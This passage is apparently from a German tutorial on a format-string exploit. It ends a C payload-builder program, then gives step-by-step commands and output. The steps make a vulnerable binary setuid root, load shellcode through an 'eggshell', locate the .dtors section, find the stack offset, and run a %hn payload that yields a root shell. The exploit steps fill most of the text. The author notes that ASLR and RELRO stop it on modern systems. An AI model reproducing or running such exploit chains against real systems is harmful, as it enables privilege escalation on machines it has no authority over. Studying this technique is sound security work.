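 * be used in backticks) and a readable copy plus its length on stderr.
 *
 * Fix over the original: it checked `argc < 3` and then read argv[3], so a
 * missing offset dereferenced a NULL pointer; three arguments are required.
 */
int
main(int argc, char **argv) {

    char *buf;

    if (argc < 4) {
        fprintf(stderr, "usage: %s <addr-hex> <value-hex> <offset>\n", argv[0]);
        return EXIT_FAILURE;
    }
    buf = build(strtoul(argv[1], NULL, 16),                 /* address */
                strtoul(argv[2], NULL, 16),                 /* value */
                (unsigned int)strtoul(argv[3], NULL, 10));  /* offset */

    fprintf(stderr, "[%s] (%lu)\n", buf, (unsigned long)strlen(buf));
    printf("%s", buf);
    free(buf);
    return EXIT_SUCCESS;
}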

------------------------------------end here------------------------------------

So nun zur Anwendung.
(kompilieren mit gcc -o vuln vuln.c, alle anderen Programme bitte genauso.)
Dann setuid root machen mit

chown root.root vuln
chmod 4775 vuln

(Nur auf einer Wegwerf-Testmaschine machen: mit 4775 ist die setuid-root-Datei gruppenschreibbar (siehe -rwsrwxr-x im Listing unten), 4755 reicht für die Demonstration und erlaubt keinem Gruppenmitglied, die Datei auszutauschen. Auf einem aktuellen System läuft die Anleitung so nicht mehr unverändert: ASLR verschiebt die Stack-Adressen, und der Linker erzeugt kein beschreibbares .dtors mehr.)

exp@delikon:~/geht> ls -la
insgesamt 91
drwxr-xr-x 2 exp users 253 Apr 27 16:16 .
drwx------ 21 exp users 2240 Apr 27 16:32 ..
-rwxr-xr-x 1 exp users 15204 Apr 27 15:53 build
-rw-r--r-- 1 exp users 3804 Apr 26 19:25 build.c
-rw-r--r-- 1 exp users 36 Apr 26 19:26 chmod.txt
-rw-r--r-- 1 exp users 34 Apr 26 19:27 dtors.tct
-rwxr-xr-x 1 exp users 14756 Apr 27 15:42 egg
-rw-r--r-- 1 exp users 1377 Apr 26 19:25 egg.c
-rwxr-xr-x 1 exp users 14121 Apr 27 16:04 find
-rw-r--r-- 1 exp users 748 Apr 27
-rwsrwxr-x 1 root root 15028 Apr 27 15:54 vuln
-rw-r--r-- 1 exp users 1009 Apr 26 19:55 vuln.c

vuln ist nun setuid root.

2. eggshell starten (der Shellcode liegt damit im Environment der neuen Shell und somit auf dem Stack jedes Programms, das aus ihr gestartet wird).

exp@delikon:~/geht> ./egg 5 6000
sh-2.05$

es gehen auch andere Werte nicht nur 5 und 6000.

3. die .dtors Sektion von vuln finden (das ist der Speicherbereich der überschrieben wird)

sh-2.05$ objdump -s -j .dtors vuln

vuln: file format elf32-i386

Contents of section .dtors:
8049a64 ffffffff 00000000 ........
sh-2.05$

also ist der Wert 0x8049a64+4 = 0x8049a68 (man muss immer 4 addieren: das erste Wort 0xffffffff markiert den Anfang der Liste, das Wort danach ist der erste Destruktor-Zeiger, der beim Beenden aufgerufen wird; lest nach unter "Overwriting the .dtors section."). Das klappt nur mit einer Toolchain, die noch ein beschreibbares .dtors erzeugt; aktuelle Linker benutzen .fini_array, und RELRO mappt es nur lesbar.

4. Als dritten Wert brauchen wir nun den Offset; der ist bei jedem Rechner verschieden.
Das mache ich ganz stupide manuell:

sh-2.05$ ./vuln AAAA%6\$x

0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0

before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA4000b07e] (12)
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"


sh-2.05$ ./vuln AAAA%7\$x

0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0

before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA8048780] (11)
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"

sh-2.05$ ./vuln AAAA%8\$x

0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0

before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA41414141] (12) <--------- Jawohl so muss das aussehen, denn A ist in hex 41 !!!!
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"

Der Offset ist also 8.
P.S. bei euch kann er auch 1 sein; ich habe hier mit 6 angefangen.


5. Nun brauchen wir den Wert, den wir nach 0x8049a68 schreiben wollen; das ist
logischerweise die Adresse unseres Shellcodes.

sh-2.05$ ./find
. SUCHE!
Shellcode ist bei ----> : 0xbffffbae

6. So, ich habe fertig. Wir haben jetzt die drei Werte, die wir brauchen: das "Wohin" (0x8049a68), das "Was" (0xbffffbae)
und den "Offset" (8).

Noch ein letztes Mal den User checken:

sh-2.05$ whoami
exp

Wir starten nun das Exploit

sh-2.05$ ./vuln `./build 0x8049a68 0xbffffbae 8`

adr : 134519400 (8049a68)
val : -1073742930 (bffffbae)
valh: 49151 (bfff)
vall: 64430 (fbae)
[jh%.49143x%8$hn%.15279x%9$hn] (34)
0 0xbffff676
1 0xbffff67d
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0

before : ptrf() = 0x8048780 (0xbffff3bc)
buffer = [jh00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000] (127)
after : ptrf() = 0x8048780 (0xbffff3bc)
Welcome in "helloWorld"

sh-2.05# whoami
root <--------------- Sieg des Menschen über die Maschine


P.S. bei euch sind alle Werte anders, es muss aber trotzdem gehen; wenn nicht, mailt mir: ich@delikon.de
oder besucht mich unter www.delikon.de.vu

 


Credits:

www.delikon.de